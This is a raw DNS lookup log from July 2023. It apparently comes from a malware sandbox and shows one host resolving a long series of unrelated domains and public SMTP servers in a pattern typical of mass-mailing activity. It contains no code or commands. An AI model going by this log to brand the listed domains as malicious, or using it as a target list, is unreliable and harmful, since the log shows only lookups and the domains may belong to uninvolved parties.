                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.054570913 CEST8.8.8.8192.168.2.60x5fe6Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.452637911 CEST8.8.8.8192.168.2.60x648No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.452637911 CEST8.8.8.8192.168.2.60x648No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.452637911 CEST8.8.8.8192.168.2.60x648No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.591145039 CEST8.8.8.8192.168.2.60x1e46Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.619298935 CEST8.8.8.8192.168.2.60x247aNo error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.619298935 CEST8.8.8.8192.168.2.60x247aNo error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.272547007 CEST8.8.8.8192.168.2.60xbdd9No error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.272547007 CEST8.8.8.8192.168.2.60xbdd9No error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.272547007 CEST8.8.8.8192.168.2.60xbdd9No error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.272547007 CEST8.8.8.8192.168.2.60xbdd9No error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.281991005 CEST8.8.8.8192.168.2.60x160No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.336240053 CEST8.8.8.8192.168.2.60x876cServer failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.391036034 CEST8.8.8.8192.168.2.60x9b4fNo error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.615691900 CEST8.8.8.8192.168.2.60xed56Server failure (2)mondopp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:15.468807936 CEST8.8.8.8192.168.2.60x2b22Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:15.650104046 CEST8.8.8.8192.168.2.60xed56Server failure (2)mondopp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:16.074316978 CEST8.8.8.8192.168.2.60x4c94No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:16.209120989 CEST8.8.8.8192.168.2.60x79a7No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:16.687170982 CEST8.8.8.8192.168.2.60x160Server failure (2)com-edit.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:16.808533907 CEST8.8.8.8192.168.2.60x1e46Server failure (2)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.106559038 CEST8.8.8.8192.168.2.60xc9c0Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.403640032 CEST8.8.8.8192.168.2.60x346dServer failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.475349903 CEST8.8.8.8192.168.2.60x4c49No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.477932930 CEST8.8.8.8192.168.2.60x1941Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.488759995 CEST8.8.8.8192.168.2.60xe0e2No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.488759995 CEST8.8.8.8192.168.2.60xe0e2No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.501060009 CEST8.8.8.8192.168.2.60x6addNo error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.510126114 CEST8.8.8.8192.168.2.60x4b2bName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.593118906 CEST8.8.8.8192.168.2.60x1925No error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.593118906 CEST8.8.8.8192.168.2.60x1925No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.593118906 CEST8.8.8.8192.168.2.60x1925No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com3.212.23.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.593118906 CEST8.8.8.8192.168.2.60x1925No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com52.204.111.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.596297026 CEST8.8.8.8192.168.2.60xc0bfName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.781363010 CEST8.8.8.8192.168.2.60xc0acServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.221056938 CEST8.8.8.8192.168.2.60xf171No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.221056938 CEST8.8.8.8192.168.2.60xf171No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.221056938 CEST8.8.8.8192.168.2.60xf171No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.221056938 CEST8.8.8.8192.168.2.60xf171No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.245857000 CEST8.8.8.8192.168.2.60x2bf5No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.245857000 CEST8.8.8.8192.168.2.60x2bf5No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.245857000 CEST8.8.8.8192.168.2.60x2bf5No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.407247066 CEST8.8.8.8192.168.2.60x346dServer failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.442971945 CEST8.8.8.8192.168.2.60xcb52No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.445163012 CEST8.8.8.8192.168.2.60xf53dNo error (0)dyag-eng.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.445163012 CEST8.8.8.8192.168.2.60xf53dNo error (0)dyag-eng.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.751303911 CEST8.8.8.8192.168.2.60x1fcaNo error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.751303911 CEST8.8.8.8192.168.2.60x1fcaNo error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.786123037 CEST8.8.8.8192.168.2.60x8e5fNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.865380049 CEST8.8.8.8192.168.2.60x127No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.028570890 CEST8.8.8.8192.168.2.60xace0No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.216341019 CEST8.8.8.8192.168.2.60x7916No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.446494102 CEST8.8.8.8192.168.2.60xc26eNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.446494102 CEST8.8.8.8192.168.2.60xc26eNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.446494102 CEST8.8.8.8192.168.2.60xc26eNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.446494102 CEST8.8.8.8192.168.2.60xc26eNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.634614944 CEST8.8.8.8192.168.2.60x346dServer failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.984854937 CEST8.8.8.8192.168.2.60x1c70No error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.134155035 CEST8.8.8.8192.168.2.60x9b94No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.280328989 CEST8.8.8.8192.168.2.60xe194No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.352247953 CEST8.8.8.8192.168.2.60xa164No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.352247953 CEST8.8.8.8192.168.2.60xa164No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.532279015 CEST8.8.8.8192.168.2.60x81aaNo error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.608510017 CEST8.8.8.8192.168.2.60x9734No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.762619972 CEST8.8.8.8192.168.2.60xd637No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.809982061 CEST8.8.8.8192.168.2.60xde79No error (0)k-nikko.com35.74.157.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.809982061 CEST8.8.8.8192.168.2.60xde79No error (0)k-nikko.com18.177.240.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:21.053111076 CEST8.8.8.8192.168.2.60x47a5No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:21.053111076 CEST8.8.8.8192.168.2.60x47a5No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:21.517460108 CEST8.8.8.8192.168.2.60xd9a2Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:21.894217968 CEST8.8.8.8192.168.2.60xac93No error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.024063110 CEST8.8.8.8192.168.2.60xffe2Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.065512896 CEST8.8.8.8192.168.2.60xb5aeNo error (0)x96.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.065512896 CEST8.8.8.8192.168.2.60xb5aeNo error (0)x96.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.255038977 CEST8.8.8.8192.168.2.60x346dServer failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.298677921 CEST8.8.8.8192.168.2.60xe4a8No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.323616028 CEST8.8.8.8192.168.2.60x5b50Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.435514927 CEST8.8.8.8192.168.2.60x40cdNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.554693937 CEST8.8.8.8192.168.2.60xe061Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.051876068 CEST8.8.8.8192.168.2.60x7565No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.089507103 CEST8.8.8.8192.168.2.60x1390Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.348503113 CEST8.8.8.8192.168.2.60x8b52Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.456006050 CEST8.8.8.8192.168.2.60x1b52No error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.456006050 CEST8.8.8.8192.168.2.60x1b52No error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.599900007 CEST8.8.8.8192.168.2.60x1faNo error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.601510048 CEST8.8.8.8192.168.2.60xb470No error (0)vfcindia.com103.191.209.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.749548912 CEST8.8.8.8192.168.2.60xfcdaNo error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.902554035 CEST8.8.8.8192.168.2.60x7ee1No error (0)webways.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.902554035 CEST8.8.8.8192.168.2.60x7ee1No error (0)webways.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.003441095 CEST8.8.8.8192.168.2.60xb5d7No error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.251579046 CEST8.8.8.8192.168.2.60xa5e1No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.451222897 CEST8.8.8.8192.168.2.60x1769No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.511431932 CEST8.8.8.8192.168.2.60x3eb7No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.511431932 CEST8.8.8.8192.168.2.60x3eb7No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.604523897 CEST8.8.8.8192.168.2.60xd952No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.613815069 CEST8.8.8.8192.168.2.60x9655No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.631203890 CEST8.8.8.8192.168.2.60xe5aaServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.729680061 CEST8.8.8.8192.168.2.60xb3b9No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.287974119 CEST8.8.8.8192.168.2.60x8a06No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.344276905 CEST8.8.8.8192.168.2.60x92bNo error (0)vfcindia.com103.191.209.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.414119959 CEST8.8.8.8192.168.2.60xa632Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.481736898 CEST8.8.8.8192.168.2.60x23c8No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.547311068 CEST8.8.8.8192.168.2.60xe5a3Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.615595102 CEST8.8.8.8192.168.2.60x7daeNo error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.807194948 CEST8.8.8.8192.168.2.60xe565Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.858984947 CEST8.8.8.8192.168.2.60x1db4No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.960499048 CEST8.8.8.8192.168.2.60x2c18Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.976814985 CEST8.8.8.8192.168.2.60x7fd3No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.977066040 CEST8.8.8.8192.168.2.60x7f48No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.089272022 CEST8.8.8.8192.168.2.60xb0eeName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.094654083 CEST8.8.8.8192.168.2.60x12b7No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.094681978 CEST8.8.8.8192.168.2.60x3b8fNo error (0)cutchie.com199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.096004009 CEST8.8.8.8192.168.2.60x1a1fNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.098330021 CEST8.8.8.8192.168.2.60x6985No error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.098330021 CEST8.8.8.8192.168.2.60x6985No error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.142476082 CEST8.8.8.8192.168.2.60x5361No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.142476082 CEST8.8.8.8192.168.2.60x5361No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.154745102 CEST8.8.8.8192.168.2.60xbe79No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.154745102 CEST8.8.8.8192.168.2.60xbe79No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.154745102 CEST8.8.8.8192.168.2.60xbe79No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.154745102 CEST8.8.8.8192.168.2.60xbe79No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.358175039 CEST8.8.8.8192.168.2.60xe5d6No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.804677010 CEST8.8.8.8192.168.2.60x66c5No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.870277882 CEST8.8.8.8192.168.2.60x7565Server failure (2)kewlmail.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.896332026 CEST8.8.8.8192.168.2.60x7656No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.039520979 CEST8.8.8.8192.168.2.60xc063No error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.039520979 CEST8.8.8.8192.168.2.60xc063No error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.110856056 CEST8.8.8.8192.168.2.60xe052No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.110856056 CEST8.8.8.8192.168.2.60xe052No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.110856056 CEST8.8.8.8192.168.2.60xe052No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.110856056 CEST8.8.8.8192.168.2.60xe052No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.274796963 CEST8.8.8.8192.168.2.60x2272Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.344602108 CEST8.8.8.8192.168.2.60x5a0cServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.400207996 CEST8.8.8.8192.168.2.60x4730Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.419851065 CEST8.8.8.8192.168.2.60x3681Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.509352922 CEST8.8.8.8192.168.2.60x8872No error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.566154957 CEST8.8.8.8192.168.2.60x87fcNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.672703981 CEST8.8.8.8192.168.2.60xd791No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.680280924 CEST8.8.8.8192.168.2.60xbe0eNo error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.680280924 CEST8.8.8.8192.168.2.60xbe0eNo error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.697496891 CEST8.8.8.8192.168.2.60x6733No error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.697496891 CEST8.8.8.8192.168.2.60x6733No error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.767550945 CEST8.8.8.8192.168.2.60x39c3No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.787765980 CEST8.8.8.8192.168.2.60xbec5Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.841906071 CEST8.8.8.8192.168.2.60x25c2Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.878158092 CEST8.8.8.8192.168.2.60xbe25Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.903281927 CEST8.8.8.8192.168.2.60xc2e6No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.937175035 CEST8.8.8.8192.168.2.60x61f5No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.939908028 CEST8.8.8.8192.168.2.60x8a44No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.199904919 CEST8.8.8.8192.168.2.60xc595No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.199904919 CEST8.8.8.8192.168.2.60xc595No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.296525002 CEST8.8.8.8192.168.2.60xe6e5No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.296525002 CEST8.8.8.8192.168.2.60xe6e5No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.507491112 CEST8.8.8.8192.168.2.60x8111Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.588141918 CEST8.8.8.8192.168.2.60x7daeServer failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.596060991 CEST8.8.8.8192.168.2.60x4d6bName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.605817080 CEST8.8.8.8192.168.2.60x9368No error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.605817080 CEST8.8.8.8192.168.2.60x9368No error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.605817080 CEST8.8.8.8192.168.2.60x9368No error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.605817080 CEST8.8.8.8192.168.2.60x9368No error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
